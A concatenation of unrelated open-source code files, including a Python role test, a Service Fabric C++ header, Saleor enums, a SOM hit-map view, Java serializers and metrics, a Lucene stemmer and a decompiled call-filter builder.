        db.session.add(location2)
        db.session.commit()
        # create a 2nd role
        # NOTE(review): role2 is added but never committed or assigned to any
        # user, so it cannot affect the assertions below — confirm intent.
        role2 = Role(name="2nd Role", location_id=location2.id)
        db.session.add(role2)
        # admins are not considered workers in the location
        g.current_user = self.admin
        assert not g.current_user.is_location_worker(
            location_id=self.location.id)
        assert not g.current_user.is_location_worker(location_id=location2.id)
        # location managers are also not considered workers
        g.current_user = self.manager
        assert not g.current_user.is_location_worker(
            location_id=self.location.id)
        assert not g.current_user.is_location_worker(location_id=location2.id)
        g.current_user = self.user1
        assert g.current_user.is_location_worker(location_id=self.location.id)
        assert not g.current_user.is_location_worker(location_id=location2.id)
| 2,888 |
2,542 | <reponame>vishnuk007/service-fabric
//------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
//------------------------------------------------------------
#pragma once
namespace ServiceModel
{
namespace ModelV2
{
        // Resource amounts (memory in GB, CPU) for a code package; takes part
        // in both Fabric binary serialization and JSON serialization.
        class CodePackageResources
            : public Serialization::FabricSerializable
            , public Common::IFabricJsonSerializable
        {
        public:
            // NOTE(review): the defaulted constructor leaves memoryInGB_ and
            // cpu_ uninitialized; presumably instances are always populated by
            // deserialization before being read — confirm.
            CodePackageResources() = default;
            // Field-wise equality; implementation lives in the .cpp.
            bool operator==(CodePackageResources const & other) const;
            DEFAULT_MOVE_ASSIGNMENT(CodePackageResources)
            DEFAULT_MOVE_CONSTRUCTOR(CodePackageResources)
            DEFAULT_COPY_ASSIGNMENT(CodePackageResources)
            DEFAULT_COPY_CONSTRUCTOR(CodePackageResources)
            // JSON mapping: "memoryInGB" and "cpu" (names come from
            // ServiceModel::Constants).
            BEGIN_JSON_SERIALIZABLE_PROPERTIES()
                SERIALIZABLE_PROPERTY(ServiceModel::Constants::memoryInGB, memoryInGB_)
                SERIALIZABLE_PROPERTY(ServiceModel::Constants::cpu, cpu_)
            END_JSON_SERIALIZABLE_PROPERTIES()
            // MSVC-style read-only property accessors.
            __declspec(property(get=get_MemoryInGB)) double MemoryInGB;
            double get_MemoryInGB() const { return memoryInGB_; }
            __declspec(property(get=get_Cpu)) double Cpu;
            double get_Cpu() const { return cpu_; }
            // Both members contribute to dynamic size estimation.
            BEGIN_DYNAMIC_SIZE_ESTIMATION()
                DYNAMIC_SIZE_ESTIMATION_MEMBER(memoryInGB_)
                DYNAMIC_SIZE_ESTIMATION_MEMBER(cpu_)
            END_DYNAMIC_SIZE_ESTIMATION()
            // Fabric binary serialization field list (order matters).
            FABRIC_FIELDS_02(
                memoryInGB_,
                cpu_);
        private:
            double memoryInGB_;
            double cpu_;
        };
        // Pairs mandatory resource requests with optional resource limits for
        // a code package. Extends ModelType, which supplies validation hooks.
        class CodePackageResourceDescription
            : public ModelType
        {
        public:
            CodePackageResourceDescription() = default;
            // Field-wise equality; implementation lives in the .cpp.
            bool operator==(CodePackageResourceDescription const & other) const;
            DEFAULT_MOVE_ASSIGNMENT(CodePackageResourceDescription)
            DEFAULT_MOVE_CONSTRUCTOR(CodePackageResourceDescription)
            DEFAULT_COPY_ASSIGNMENT(CodePackageResourceDescription)
            DEFAULT_COPY_CONSTRUCTOR(CodePackageResourceDescription)
            // JSON: "resourcesRequests" always emitted; "resourcesLimits" only
            // when a limits object is present.
            BEGIN_JSON_SERIALIZABLE_PROPERTIES()
                SERIALIZABLE_PROPERTY(ServiceModel::Constants::resourcesRequests, resourceRequests_)
                SERIALIZABLE_PROPERTY_IF(ServiceModel::Constants::resourcesLimits, resourceLimitsPtr_, resourceLimitsPtr_ != nullptr)
            END_JSON_SERIALIZABLE_PROPERTIES()
            // Validation entry point declared by ModelType; defined in .cpp.
            Common::ErrorCode TryValidate(std::wstring const &traceId) const override;
            BEGIN_DYNAMIC_SIZE_ESTIMATION()
                DYNAMIC_SIZE_ESTIMATION_MEMBER(resourceRequests_)
                DYNAMIC_SIZE_ESTIMATION_MEMBER(resourceLimitsPtr_)
            END_DYNAMIC_SIZE_ESTIMATION()
            // Fabric binary serialization field list (order matters).
            FABRIC_FIELDS_02(resourceRequests_, resourceLimitsPtr_);
        private:
            // Mandatory requested resources.
            CodePackageResources resourceRequests_;
            // Optional upper limits; null means "no explicit limit".
            std::shared_ptr<CodePackageResources> resourceLimitsPtr_;
        };
}
}
| 1,374 |
15,337 | <reponame>fairhopeweb/saleor<gh_stars>1000+
import graphene
from ...product import ProductTypeKind
from ..core.enums import to_enum
# GraphQL enum generated from the Django-side ProductTypeKind choices.
ProductTypeKindEnum = to_enum(ProductTypeKind)
# Which level of the catalog an attribute is attached to.
class ProductAttributeType(graphene.Enum):
    PRODUCT = "PRODUCT"
    VARIANT = "VARIANT"
# Stock filter values.
# NOTE(review): IN_STOCK serializes as "AVAILABLE", unlike its member name —
# presumably kept for API backward compatibility; confirm before changing.
class StockAvailability(graphene.Enum):
    IN_STOCK = "AVAILABLE"
    OUT_OF_STOCK = "OUT_OF_STOCK"
# Visibility filter for collections.
class CollectionPublished(graphene.Enum):
    PUBLISHED = "published"
    HIDDEN = "hidden"
# Whether a product type allows variants (configurable) or not (simple).
class ProductTypeConfigurable(graphene.Enum):
    CONFIGURABLE = "configurable"
    SIMPLE = "simple"
# Digital vs. physically shipped product types.
class ProductTypeEnum(graphene.Enum):
    DIGITAL = "digital"
    SHIPPABLE = "shippable"
# Scope filter for variant attributes.
class VariantAttributeScope(graphene.Enum):
    ALL = "all"
    VARIANT_SELECTION = "variant_selection"
    NOT_VARIANT_SELECTION = "not_variant_selection"
| 317 |
500 | from collections import Counter
import matplotlib
import numpy as np
from matplotlib import pyplot as plt
from .mapview import MapView
from sompy.visualization.plot_tools import plot_hex_map
class BmuHitsView(MapView):
    """Heat-map view of how many samples hit each SOM codebook unit (BMU).

    Supports both rectangular and hexagonal lattices; reads ``som._bmu`` and
    ``som.codebook`` from the trained SOM passed to :meth:`show`.
    """

    def _set_labels(self, cents, ax, labels, onlyzeros, fontsize, use_hex=False):
        """Annotate each map cell with its hit count.

        :param cents: cell centres. With ``use_hex`` these are already plot
            coordinates; otherwise a 2-column array indexed as
            ``cents[i, 1]`` / ``cents[-(i + 1), 0]``.
        :param labels: iterable of per-cell counts.
        :param onlyzeros: if true, blank every non-zero count so that only
            zero-hit cells stay labelled.
        :param fontsize: annotation font size.
        :param use_hex: centres come from the hexagonal plot helper.
            (Renamed from ``hex``, which shadowed the builtin.)
        """
        for i, txt in enumerate(labels):
            if onlyzeros and txt > 0:
                txt = ""
            if use_hex:
                c = cents[i]
            else:
                c = (cents[i, 1] + 0.5, cents[-(i + 1), 0] + 0.5)
            ax.annotate(txt, c, va="center", ha="center", size=fontsize)

    def show(self, som, anotate=True, onlyzeros=False, labelsize=7, cmap="jet",
             logaritmic=False):
        """Render the BMU hit-count heatmap for ``som``.

        :param som: trained SOM instance.
        :param anotate: annotate cells with their counts (sic — the original,
            misspelled keyword is kept for backward compatibility).
        :param onlyzeros: label only zero-hit cells.
        :param labelsize: annotation font size.
        :param cmap: matplotlib colormap name.
        :param logaritmic: use a logarithmic color scale (sic).
        """
        org_w = self.width
        org_h = self.height
        (self.width, self.height, indtoshow, no_row_in_plot, no_col_in_plot,
         axis_num) = self._calculate_figure_params(som, 1, 1)
        # Rescale so the larger dimension matches the requested figure size.
        # NOTE(review): the second line reads self.width *after* it was
        # updated above — looks unintended, but preserved so output stays
        # identical to previous releases.
        self.width /= (self.width / org_w) if self.width > self.height else (self.height / org_h)
        self.height /= (self.width / org_w) if self.width > self.height else (self.height / org_h)

        # Per-unit hit counts, including units that were never a BMU (0).
        counts = Counter(som._bmu[0])
        counts = [counts.get(x, 0)
                  for x in range(som.codebook.mapsize[0] * som.codebook.mapsize[1])]
        mp = np.array(counts).reshape(som.codebook.mapsize[0],
                                      som.codebook.mapsize[1])

        if not logaritmic:
            norm = matplotlib.colors.Normalize(
                vmin=0, vmax=np.max(mp.flatten()), clip=True)
        else:
            # A log scale cannot contain 0, hence vmin=1.
            norm = matplotlib.colors.LogNorm(vmin=1, vmax=np.max(mp.flatten()))

        msz = som.codebook.mapsize
        cents = som.bmu_ind_to_xy(np.arange(0, msz[0] * msz[1]))

        self.prepare()
        if som.codebook.lattice == "rect":
            ax = plt.gca()
            if anotate:
                self._set_labels(cents, ax, counts, onlyzeros, labelsize)
            pl = plt.pcolor(mp[::-1], norm=norm, cmap=cmap)
            plt.axis([0, som.codebook.mapsize[1], 0, som.codebook.mapsize[0]])
            ax.set_yticklabels([])
            ax.set_xticklabels([])
            plt.colorbar(pl)
        elif som.codebook.lattice == "hexa":
            ax, cents = plot_hex_map(mp[::-1], colormap=cmap, fig=self._fig)
            if anotate:
                self._set_labels(cents, ax, reversed(counts), onlyzeros,
                                 labelsize, use_hex=True)
| 1,309 |
399 | package com.amazonaws.athena.connector.lambda.serde;
/*-
* #%L
* Amazon Athena Query Federation SDK
* %%
* Copyright (C) 2019 Amazon Web Services
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* #L%
*/
import com.amazonaws.athena.connector.lambda.data.Block;
import com.amazonaws.athena.connector.lambda.data.RecordBatchSerDe;
import com.amazonaws.athena.connector.lambda.data.SchemaSerDe;
import com.fasterxml.jackson.core.JsonGenerator;
import com.fasterxml.jackson.databind.SerializerProvider;
import com.fasterxml.jackson.databind.ser.std.StdSerializer;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
/**
* Uses either an explicit BlockAllocator or a BlockAllocatorRegistry to handle memory pooling associated with
* serializing blocks. Blocks are serialized as an Apache Arrow Schema + Apache Arrow Record Batch. If you
* need to serialize multiple Blocks of the same Schema we do not recommend using this class since it will
* result in the same schema being serialized multiple times. It may be more efficient for you to serialize
* the Schema once, separately, and then each Record Batch.
*
* This class also attempts to make use of the allocator_id field of the Block so that it will reuse the
* same allocator id when deserializing. This can be helpful when attempting to limit the number of copy
* operations that are required to move a Block around. It also allows you to put tighter control around
* which parts of your query execution get which memory pool / limit.
*
* @deprecated {@link com.amazonaws.athena.connector.lambda.serde.v3.BlockSerDeV3} should be used instead
*/
@Deprecated
public class BlockSerializer
        extends StdSerializer<Block>
{
    protected static final String ALLOCATOR_ID_FIELD_NAME = "aId";
    protected static final String SCHEMA_FIELD_NAME = "schema";
    protected static final String BATCH_FIELD_NAME = "records";

    private final SchemaSerDe schemaSerDe;
    private final RecordBatchSerDe recordBatchSerDe;

    public BlockSerializer()
    {
        super(Block.class);
        this.schemaSerDe = new SchemaSerDe();
        // The RecordBatchSerDe only needs an allocator for deserialization,
        // so null is acceptable on the serialization side.
        this.recordBatchSerDe = new RecordBatchSerDe(null);
    }

    /**
     * Writes a Block as a JSON object with three fields: the allocator id,
     * the Arrow Schema (binary), and the Arrow Record Batch (binary; empty
     * when the block has no rows).
     */
    @Override
    public void serialize(Block block, JsonGenerator jsonGenerator, SerializerProvider serializerProvider)
            throws IOException
    {
        jsonGenerator.writeStartObject();
        jsonGenerator.writeStringField(ALLOCATOR_ID_FIELD_NAME, block.getAllocatorId());

        try (ByteArrayOutputStream schemaOut = new ByteArrayOutputStream()) {
            schemaSerDe.serialize(block.getSchema(), schemaOut);
            jsonGenerator.writeBinaryField(SCHEMA_FIELD_NAME, schemaOut.toByteArray());
        }

        ByteArrayOutputStream batchOut = new ByteArrayOutputStream();
        // The original also checked `block != null` here, but block has
        // already been dereferenced above, so that check was dead code.
        // Only the row-count guard is meaningful: an empty batch is encoded
        // as a zero-length binary field.
        if (block.getRowCount() > 0) {
            recordBatchSerDe.serialize(block.getRecordBatch(), batchOut);
        }
        jsonGenerator.writeBinaryField(BATCH_FIELD_NAME, batchOut.toByteArray());
        jsonGenerator.writeEndObject();
    }
}
| 1,122 |
381 | <gh_stars>100-1000
package org.apache.helix.monitoring.metrics;
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
import javax.management.JMException;
import org.apache.helix.HelixException;
import org.apache.helix.monitoring.mbeans.MonitorDomainNames;
import org.apache.helix.monitoring.metrics.implementation.BaselineDivergenceGauge;
import org.apache.helix.monitoring.metrics.implementation.RebalanceCounter;
import org.apache.helix.monitoring.metrics.implementation.RebalanceFailureCount;
import org.apache.helix.monitoring.metrics.implementation.RebalanceLatencyGauge;
import org.apache.helix.monitoring.metrics.model.CountMetric;
import org.apache.helix.monitoring.metrics.model.LatencyMetric;
import org.apache.helix.monitoring.metrics.model.RatioMetric;
public class WagedRebalancerMetricCollector extends MetricCollector {
  private static final String WAGED_REBALANCER_ENTITY_NAME = "WagedRebalancer";

  /**
   * All metric names defined for the WAGED rebalancer. Note that all enums are in camel case for
   * readability.
   */
  public enum WagedRebalancerMetricNames {
    // Per-stage latency metrics
    GlobalBaselineCalcLatencyGauge,
    PartialRebalanceLatencyGauge,

    // Latency metrics of the AssignmentMetadataStore
    StateReadLatencyGauge,
    StateWriteLatencyGauge,

    /*
     * Gauge of the difference (state and partition allocation) between the baseline and the best
     * possible assignment.
     */
    BaselineDivergenceGauge,

    // Count of any rebalance compute failure. The rebalancer may still return the last known-good
    // assignment on a compute failure; that fallback does not affect this count.
    RebalanceFailureCounter,

    // Waged rebalance counters.
    GlobalBaselineCalcCounter,
    PartialRebalanceCounter
  }

  public WagedRebalancerMetricCollector(String clusterName) {
    super(MonitorDomainNames.Rebalancer.name(), clusterName, WAGED_REBALANCER_ENTITY_NAME);
    createMetrics();
    // Without a cluster name the collector stays unregistered (metrics are
    // still created so callers can use them without emitting).
    if (clusterName == null) {
      return;
    }
    try {
      register();
    } catch (JMException e) {
      throw new HelixException("Failed to register MBean for the WagedRebalancerMetricCollector.",
          e);
    }
  }

  /**
   * Creates the metrics but does not register them. Used when registration previously failed with
   * a JMException, so the rebalancer can proceed without emitting metrics.
   */
  public WagedRebalancerMetricCollector() {
    this(null);
  }

  /** Builds a per-stage latency gauge for the given metric name. */
  private LatencyMetric newLatencyGauge(WagedRebalancerMetricNames metricName) {
    return new RebalanceLatencyGauge(metricName.name(), getResetIntervalInMs());
  }

  /**
   * Creates and adds all WagedRebalancer metrics to this collector.
   */
  private void createMetrics() {
    // Per-stage and metadata-store latency gauges.
    addMetric(newLatencyGauge(WagedRebalancerMetricNames.GlobalBaselineCalcLatencyGauge));
    addMetric(newLatencyGauge(WagedRebalancerMetricNames.PartialRebalanceLatencyGauge));
    addMetric(newLatencyGauge(WagedRebalancerMetricNames.StateReadLatencyGauge));
    addMetric(newLatencyGauge(WagedRebalancerMetricNames.StateWriteLatencyGauge));
    // Baseline-vs-best-possible divergence.
    addMetric(new BaselineDivergenceGauge(
        WagedRebalancerMetricNames.BaselineDivergenceGauge.name()));
    // Failure and rebalance counters.
    addMetric(new RebalanceFailureCount(
        WagedRebalancerMetricNames.RebalanceFailureCounter.name()));
    addMetric(new RebalanceCounter(
        WagedRebalancerMetricNames.GlobalBaselineCalcCounter.name()));
    addMetric(new RebalanceCounter(
        WagedRebalancerMetricNames.PartialRebalanceCounter.name()));
  }
}
| 1,701 |
903 | <filename>lucene/analysis/common/src/java/org/apache/lucene/analysis/hunspell/HunspellStemFilter.java
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.lucene.analysis.hunspell;
import java.io.IOException;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import org.apache.lucene.analysis.TokenFilter;
import org.apache.lucene.analysis.TokenStream;
import org.apache.lucene.analysis.tokenattributes.CharTermAttribute;
import org.apache.lucene.analysis.tokenattributes.KeywordAttribute;
import org.apache.lucene.analysis.tokenattributes.PositionIncrementAttribute;
import org.apache.lucene.util.CharsRef;
/**
* TokenFilter that uses hunspell affix rules and words to stem tokens. Since hunspell supports a
* word having multiple stems, this filter can emit multiple tokens for each consumed token
*
* <p>Note: This filter is aware of the {@link KeywordAttribute}. To prevent certain terms from
* being passed to the stemmer {@link KeywordAttribute#isKeyword()} should be set to <code>true
* </code> in a previous {@link TokenStream}.
*
* <p>Note: For including the original term as well as the stemmed version, see {@link
* org.apache.lucene.analysis.miscellaneous.KeywordRepeatFilterFactory}
*
* @lucene.experimental
*/
public final class HunspellStemFilter extends TokenFilter {

  private final CharTermAttribute termAtt = addAttribute(CharTermAttribute.class);
  private final PositionIncrementAttribute posIncAtt =
      addAttribute(PositionIncrementAttribute.class);
  private final KeywordAttribute keywordAtt = addAttribute(KeywordAttribute.class);
  private final Stemmer stemmer;

  // Remaining stems of the current input token; drained one per
  // incrementToken() call before the next input token is consumed.
  private List<CharsRef> buffer;
  // Attribute state captured when the first stem was emitted; restored for
  // each additional stem so offsets/flags of the original token carry over.
  private State savedState;

  private final boolean dedup;
  private final boolean longestOnly;

  /**
   * Create a {@link HunspellStemFilter} outputting all possible stems.
   *
   * @see #HunspellStemFilter(TokenStream, Dictionary, boolean)
   */
  public HunspellStemFilter(TokenStream input, Dictionary dictionary) {
    this(input, dictionary, true);
  }

  /**
   * Create a {@link HunspellStemFilter} outputting all possible stems.
   *
   * @see #HunspellStemFilter(TokenStream, Dictionary, boolean, boolean)
   */
  public HunspellStemFilter(TokenStream input, Dictionary dictionary, boolean dedup) {
    this(input, dictionary, dedup, false);
  }

  /**
   * Creates a new HunspellStemFilter that will stem tokens from the given TokenStream using affix
   * rules in the provided Dictionary
   *
   * @param input TokenStream whose tokens will be stemmed
   * @param dictionary HunspellDictionary containing the affix rules and words that will be used to
   *     stem the tokens
   * @param dedup true if duplicate stems of a token should be collapsed into one
   * @param longestOnly true if only the longest term should be output.
   */
  public HunspellStemFilter(
      TokenStream input, Dictionary dictionary, boolean dedup, boolean longestOnly) {
    super(input);
    this.dedup = dedup && longestOnly == false; // don't waste time deduping if longestOnly is set
    this.stemmer = new Stemmer(dictionary);
    this.longestOnly = longestOnly;
  }

  @Override
  public boolean incrementToken() throws IOException {
    // First drain any stems left over from the previous input token; each
    // extra stem is emitted at the same position (position increment 0).
    if (buffer != null && !buffer.isEmpty()) {
      CharsRef nextStem = buffer.remove(0);
      restoreState(savedState);
      posIncAtt.setPositionIncrement(0);
      termAtt.setEmpty().append(nextStem);
      return true;
    }

    if (!input.incrementToken()) {
      return false;
    }

    // Keyword-marked terms bypass stemming entirely (see class javadoc).
    if (keywordAtt.isKeyword()) {
      return true;
    }

    buffer =
        dedup
            ? stemmer.uniqueStems(termAtt.buffer(), termAtt.length())
            : stemmer.stem(termAtt.buffer(), termAtt.length());

    if (buffer.isEmpty()) { // we do not know this word, return it unchanged
      return true;
    }

    // Put the longest stem first when only the longest should survive.
    if (longestOnly && buffer.size() > 1) {
      Collections.sort(buffer, lengthComparator);
    }

    CharsRef stem = buffer.remove(0);
    termAtt.setEmpty().append(stem);

    if (longestOnly) {
      buffer.clear();
    } else {
      if (!buffer.isEmpty()) {
        // More stems to emit on subsequent calls: remember the current
        // attribute state so they inherit it.
        savedState = captureState();
      }
    }

    return true;
  }

  @Override
  public void reset() throws IOException {
    super.reset();
    buffer = null;
  }

  // Orders longer stems first; ties are broken by reversed natural text order.
  static final Comparator<CharsRef> lengthComparator =
      new Comparator<CharsRef>() {
        @Override
        public int compare(CharsRef o1, CharsRef o2) {
          int cmp = Integer.compare(o2.length, o1.length);
          if (cmp == 0) {
            // tie break on text
            return o2.compareTo(o1);
          } else {
            return cmp;
          }
        }
      };
}
| 1,738 |
2,858 | /*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT-style license found in the
* LICENSE file in the root directory of this source tree.
*/
#include <cmath>
#include <stdexcept>
#include <gtest/gtest.h>
#include "flashlight/fl/tensor/Index.h"
#include "flashlight/fl/tensor/Random.h"
#include "flashlight/fl/tensor/TensorBackend.h"
#include "flashlight/fl/tensor/TensorBase.h"
#include "flashlight/fl/tensor/TensorExtension.h"
using namespace ::testing;
using namespace fl;
// Extension interface
// Extension interface: the contract a backend-specific test extension must
// implement. Registered under the Generic extension type.
class TestTensorExtension : public TensorExtension<TestTensorExtension> {
 public:
  static constexpr TensorExtensionType extensionType =
      TensorExtensionType::Generic;

  TestTensorExtension() = default;
  virtual ~TestTensorExtension() = default;

  // Backend-specific operation under test (see the ArrayFire impl below).
  virtual Tensor testExtensionFunc(const Tensor& tensor) = 0;
};
// Specific extension implementation
// Specific extension implementation for the ArrayFire backend:
// the test op simply returns tensor + 1.
class TestArrayFireTensorExtension : public TestTensorExtension {
 public:
  // Set when FL_REGISTER_TENSOR_EXTENSION runs at static-init time.
  static bool registered;

  Tensor testExtensionFunc(const Tensor& tensor) override {
    return tensor + 1;
  }

  // This test extension accepts every dtype.
  bool isDataTypeSupported(const fl::dtype&) const override {
    return true;
  }
};
// Op in API
// Public API entry point: looks up the TestTensorExtension registered for the
// tensor's backend and forwards the call to it.
Tensor testExtensionFunc(const Tensor& tensor) {
  auto& extension = tensor.backend().getExtension<TestTensorExtension>();
  return extension.testExtensionFunc(tensor);
}
FL_REGISTER_TENSOR_EXTENSION(
TestArrayFireTensorExtension,
TensorBackendType::ArrayFire);
// Verifies that the ArrayFire test extension was registered at static-init
// time, that re-registration reports success, and that the dispatching API
// routes to the extension (whose op is tensor + 1).
TEST(TensorExtensionTest, TestExtension) {
  auto a = fl::rand({4, 5, 6});
  ASSERT_TRUE(TestArrayFireTensorExtension::registered);
  // TODO: this test only works with the ArrayFire backend - gate accordingly
  if (Tensor().backendType() != TensorBackendType::ArrayFire) {
    GTEST_SKIP() << "Flashlight not built with ArrayFire backend.";
  }
  // TODO: add a fixture to check with available backends
  // Already registered - returns true
  ASSERT_TRUE(::fl::registerTensorExtension<TestArrayFireTensorExtension>(
      TensorBackendType::ArrayFire));
  ASSERT_TRUE(allClose(testExtensionFunc(a), a + 1));
}
| 678 |
9,402 | <filename>src/mono/mono/unit-tests/test-mono-embed.c
/*
* test-mono-embed.c: Unit test for embed mono.
*/
#define _TESTCASE_
#include <mono/mini/jit.h>
#include <embed/teste.c>
| 79 |
1,405 | package tms;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.IntentFilter;
import com.tencent.tmsecure.common.ManagerCreator;
import com.tencent.tmsecure.common.TMSApplication;
import com.tencent.tmsecure.module.aresengine.AbsSysDao;
import com.tencent.tmsecure.module.aresengine.AresEngineFactor;
import com.tencent.tmsecure.module.aresengine.AresEngineManager;
import com.tencent.tmsecure.module.aresengine.CallLogEntity;
import com.tencent.tmsecure.module.aresengine.ContactEntity;
import com.tencent.tmsecure.module.aresengine.DataFilter;
import com.tencent.tmsecure.module.aresengine.DataHandler;
import com.tencent.tmsecure.module.aresengine.DataIntercepterBuilder;
import com.tencent.tmsecure.module.aresengine.DataMonitor;
import com.tencent.tmsecure.module.aresengine.FilterConfig;
import com.tencent.tmsecure.module.aresengine.FilterResult;
import com.tencent.tmsecure.module.aresengine.IContactDao;
import com.tencent.tmsecure.module.aresengine.ILastCallLogDao;
import com.tencent.tmsecure.module.aresengine.IPhoneDeviceController;
import com.tencent.tmsecure.module.aresengine.InComingCallFilter;
import tms.ax;
/**
 * Decompiled (obfuscated) builder that assembles the incoming-call
 * interception pipeline: a {@link DataFilter}, a {@link DataHandler} and a
 * {@link DataMonitor} for {@link CallLogEntity} events.
 *
 * NOTE(review): this is decompiler output; identifiers are obfuscated and the
 * comments below describe only what the visible code does — confirm any
 * intent against the original sources.
 */
public final class bn extends DataIntercepterBuilder<CallLogEntity> {
    // Application context, used to construct the call monitor.
    private Context a = TMSApplication.getApplicaionContext();

    /** Incoming-call filter wired to the engine's white/black/private list DAOs. */
    static final class a extends InComingCallFilter {
        private IContactDao<? extends ContactEntity> a;  // white list DAO
        private IContactDao<? extends ContactEntity> b;  // black list DAO
        private IContactDao<? extends ContactEntity> c;  // private list DAO
        private AbsSysDao d;
        private ILastCallLogDao e;
        private ax f = new ax();  // rule dispatcher keyed by bit flags 1..32
        private IPhoneDeviceController g;

        a() {
            // Register the six rule slots (bit flags) and their callbacks.
            this.f.a(1, 2, 4, 8, 16, 32);
            this.f.a(1, a(1));
            this.f.a(2, a(2));
            this.f.a(4, a(4));
            this.f.a(8, a(8));
            this.f.a(16, a(16));
            this.f.a(32, a(32));
            // Pull all collaborators from the engine factor singleton.
            AresEngineFactor aresEngineFactor = ((AresEngineManager) ManagerCreator.getManager(AresEngineManager.class)).getAresEngineFactor();
            this.g = aresEngineFactor.getPhoneDeviceController();
            this.a = aresEngineFactor.getWhiteListDao();
            this.b = aresEngineFactor.getBlackListDao();
            this.c = aresEngineFactor.getPrivateListDao();
            this.e = aresEngineFactor.getLastCallLogDao();
            this.d = aresEngineFactor.getSysDao();
        }

        // Builds the rule callback bound to the given flag value.
        private ax.a a(int i) {
            return new bc(this, i);
        }

        // Default config: rule 4 enabled (value 1), all others disabled (0).
        @Override // com.tencent.tmsecure.module.aresengine.DataFilter
        public final FilterConfig defalutFilterConfig() {
            FilterConfig filterConfig = new FilterConfig();
            filterConfig.set(1, 0);
            filterConfig.set(2, 0);
            filterConfig.set(4, 1);
            filterConfig.set(8, 0);
            filterConfig.set(16, 0);
            filterConfig.set(32, 0);
            return filterConfig;
        }

        /* JADX DEBUG: Method arguments types fixed to match base method, original types: [com.tencent.tmsecure.module.aresengine.TelephonyEntity, java.lang.Object[]] */
        /* access modifiers changed from: protected */
        // Delegates filtering of a call-log entity to the rule dispatcher.
        @Override // com.tencent.tmsecure.module.aresengine.DataFilter
        public final /* synthetic */ FilterResult onFiltering(CallLogEntity callLogEntity, Object[] objArr) {
            return this.f.a(callLogEntity, getConfig(), objArr);
        }

        @Override // com.tencent.tmsecure.module.aresengine.InComingCallFilter
        public final void setBlacklistDao(IContactDao<? extends ContactEntity> iContactDao) {
            this.b = iContactDao;
        }

        @Override // com.tencent.tmsecure.module.aresengine.InComingCallFilter
        public final void setLastCallLogDao(ILastCallLogDao iLastCallLogDao) {
            this.e = iLastCallLogDao;
        }

        @Override // com.tencent.tmsecure.module.aresengine.InComingCallFilter
        public final void setPhoneDeviceController(IPhoneDeviceController iPhoneDeviceController) {
            this.g = iPhoneDeviceController;
        }

        @Override // com.tencent.tmsecure.module.aresengine.InComingCallFilter
        public final void setPrivatelistDao(IContactDao<? extends ContactEntity> iContactDao) {
            this.c = iContactDao;
        }

        @Override // com.tencent.tmsecure.module.aresengine.InComingCallFilter
        public final void setSysDao(AbsSysDao absSysDao) {
            this.d = absSysDao;
        }

        @Override // com.tencent.tmsecure.module.aresengine.InComingCallFilter
        public final void setWhitelistDao(IContactDao<? extends ContactEntity> iContactDao) {
            this.a = iContactDao;
        }
    }

    /**
     * Call monitor: registers a max-priority PHONE_STATE broadcast receiver on
     * construction and unregisters it in finalize().
     *
     * NOTE(review): relying on finalize() for unregistration is fragile
     * (finalization timing is not guaranteed) — kept as decompiled.
     */
    static final class b extends DataMonitor<CallLogEntity> {
        private Context a;
        private BroadcastReceiver b = new be(this);

        public b(Context context) {
            this.a = context;
            IntentFilter intentFilter = new IntentFilter();
            intentFilter.setPriority(Integer.MAX_VALUE);
            intentFilter.addCategory("android.intent.category.DEFAULT");
            intentFilter.addAction("android.intent.action.PHONE_STATE");
            this.a.registerReceiver(this.b, intentFilter);
        }

        /* access modifiers changed from: protected */
        public final void finalize() throws Throwable {
            this.a.unregisterReceiver(this.b);
            super.finalize();
        }
    }

    @Override // com.tencent.tmsecure.module.aresengine.DataIntercepterBuilder
    public final DataFilter<CallLogEntity> getDataFilter() {
        // NOTE(review): unused local retained from decompilation.
        Context context = this.a;
        return new a();
    }

    @Override // com.tencent.tmsecure.module.aresengine.DataIntercepterBuilder
    public final DataHandler getDataHandler() {
        return new DataHandler();
    }

    @Override // com.tencent.tmsecure.module.aresengine.DataIntercepterBuilder
    public final DataMonitor<CallLogEntity> getDataMonitor() {
        return new b(this.a);
    }

    /* access modifiers changed from: protected */
    @Override // com.tencent.tmsecure.module.aresengine.DataIntercepterBuilder
    public final String getName() {
        return DataIntercepterBuilder.TYPE_INCOMING_CALL;
    }
}
| 2,490 |
460 | //
// FractionTokenInterpreter.h
// FractionCalculateEngine
//
// Created by lmsgsendnilself on 16/5/12.
// Copyright © 2016年 p. All rights reserved.
//
#import <Foundation/Foundation.h>
@class FractionTokenizer;
/// Interprets the token stream produced by a FractionTokenizer.
@interface FractionTokenInterpreter : NSObject

/// The interpreted tokens, in source order.
@property(readonly) NSArray *tokens;

/// Initializes the interpreter with a tokenizer's output.
/// NOTE(review): presumably returns nil and populates *error on an invalid
/// token stream — confirm against the implementation.
- (instancetype)initWithTokenizer:(FractionTokenizer *)tokenizer error:(NSError *__autoreleasing*)error;

@end
| 147 |
368 | #include <stdlib.h>
